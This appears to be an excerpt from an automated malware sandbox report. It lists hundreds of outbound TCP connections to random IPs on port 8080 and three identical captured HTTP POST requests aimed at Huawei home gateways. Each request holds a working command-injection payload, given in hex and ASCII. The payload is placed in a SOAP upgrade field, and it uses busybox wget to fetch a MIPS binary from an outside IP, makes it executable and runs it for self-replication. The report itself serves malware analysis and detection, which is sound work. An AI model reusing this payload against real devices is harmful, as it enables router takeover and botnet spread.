                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 182.93.246.113:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 94.184.116.245:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 166.142.101.105:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 158.62.96.137:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 36.183.35.141:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 14.74.227.81:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 175.225.88.222:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 63.14.88.224:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 50.220.40.238:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 93.252.182.130:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 131.128.143.253:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 157.235.220.97:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 193.199.242.236:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 116.63.242.176:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 49.165.250.143:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 45.246.84.69:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 144.86.108.112:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 202.153.147.219:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 98.147.96.149:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 107.63.195.25:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 60.156.190.91:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 210.53.201.200:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 219.48.166.200:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 122.230.108.10:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 106.131.21.168:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 190.36.198.152:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 69.80.246.133:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 91.65.193.175:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 130.163.200.219:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 132.185.199.12:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 145.223.188.244:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 126.166.138.219:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 89.231.145.113:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 153.48.213.11:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 219.86.181.136:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 213.134.246.247:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 19.36.11.37:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 186.184.236.72:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 212.179.78.69:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 89.93.195.162:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 44.171.45.185:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 140.204.204.125:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 79.13.229.115:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 166.30.72.148:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 194.187.194.15:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 49.139.23.11:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 171.223.244.243:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 144.51.142.49:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 154.68.201.187:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 208.222.252.198:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 219.55.70.30:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 63.26.29.240:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 77.97.83.3:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 23.196.212.238:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 202.129.75.135:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 144.2.22.41:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 140.133.207.104:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 71.147.76.45:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 86.19.238.2:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 216.215.10.180:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 40.95.75.170:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 80.145.220.238:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 180.79.139.185:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 209.7.189.47:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 106.250.171.140:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 163.31.126.42:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 25.105.244.205:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 217.177.58.202:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 129.215.6.37:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 132.4.79.168:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 87.136.243.199:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 204.45.180.101:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 194.152.102.144:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 135.217.71.188:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 23.43.69.189:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 201.13.211.209:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 52.220.145.62:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 90.172.163.8:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 195.33.85.22:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 169.14.183.175:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 31.60.57.31:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 218.217.59.255:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 19.20.255.166:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 68.226.34.205:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 151.25.31.118:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 197.69.71.240:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 191.203.68.99:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 117.119.216.84:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 38.68.1.217:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 69.102.53.110:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 73.21.114.188:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 41.54.61.92:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 92.216.152.21:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 17.144.188.157:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 194.153.49.74:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 61.213.200.48:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 83.52.83.168:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 75.241.47.248:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 195.93.114.57:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 131.20.170.10:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 123.179.198.157:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 203.44.84.255:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 115.51.189.254:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 151.5.153.27:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 54.160.131.48:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 78.185.124.16:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 39.40.92.171:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 113.50.26.52:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 205.93.96.225:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 171.244.36.151:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 75.2.132.85:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 125.185.218.42:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 132.114.138.218:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 97.109.86.19:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 46.48.98.139:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 100.194.120.21:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 79.125.22.176:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 112.208.105.117:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 59.57.153.135:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 101.244.55.40:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 138.141.201.113:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 98.192.72.218:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 23.182.242.87:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 110.192.192.242:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 44.61.52.18:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 123.41.36.210:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 142.47.128.146:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 31.160.4.215:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 130.224.128.221:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 189.105.34.216:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 41.108.106.17:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 64.17.59.1:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 203.6.140.65:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 152.144.127.173:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 62.32.70.166:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 182.160.2.196:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 68.178.153.192:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 126.17.196.58:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 178.171.182.211:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 184.194.250.100:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 212.124.55.142:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 14.80.15.166:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 103.30.236.1:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 113.230.21.160:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 36.6.55.165:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 210.153.23.225:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 177.98.101.224:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 8.51.228.155:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 69.28.169.192:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 217.131.170.68:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 84.190.66.50:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 41.185.45.53:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 2.90.107.170:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 138.218.58.19:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 115.75.136.211:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 124.196.57.117:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 65.61.78.219:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 92.77.73.203:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 193.136.132.63:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 180.218.164.23:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 193.42.171.185:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 131.250.113.168:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 47.139.21.190:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 128.84.133.55:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 102.63.109.133:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 104.190.61.191:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 90.245.237.88:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 133.17.35.166:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 138.93.16.138:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 170.205.21.129:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 62.143.69.237:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 103.70.106.210:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 211.103.139.16:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 153.7.217.113:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 120.180.104.177:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 8.168.159.19:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 154.122.51.3:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 51.128.80.124:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 78.137.65.45:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 160.139.61.29:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 137.253.45.126:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 45.39.230.27:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 18.202.189.248:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 2.47.25.143:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 220.3.181.67:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 122.224.78.214:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 150.233.207.239:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 87.114.117.67:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 148.106.190.111:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 157.219.55.159:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 189.32.124.53:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 182.1.135.201:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 132.206.115.61:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 146.70.89.249:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 208.41.220.65:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 70.224.0.86:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 141.50.238.144:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 209.50.141.216:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 113.127.64.27:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 24.222.118.42:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 9.227.95.129:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 63.177.252.48:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 45.144.249.186:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 151.129.248.74:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 205.27.123.255:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 66.193.253.226:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 46.29.15.210:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 146.214.58.26:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 63.69.41.66:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 53.194.224.207:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 100.233.66.185:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 139.229.4.24:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 118.182.108.214:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 73.6.49.246:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 223.124.125.242:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 81.65.10.219:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 141.96.117.105:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 211.149.227.54:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 31.137.199.103:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 140.128.127.49:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 188.206.220.25:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 182.37.76.87:8080
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
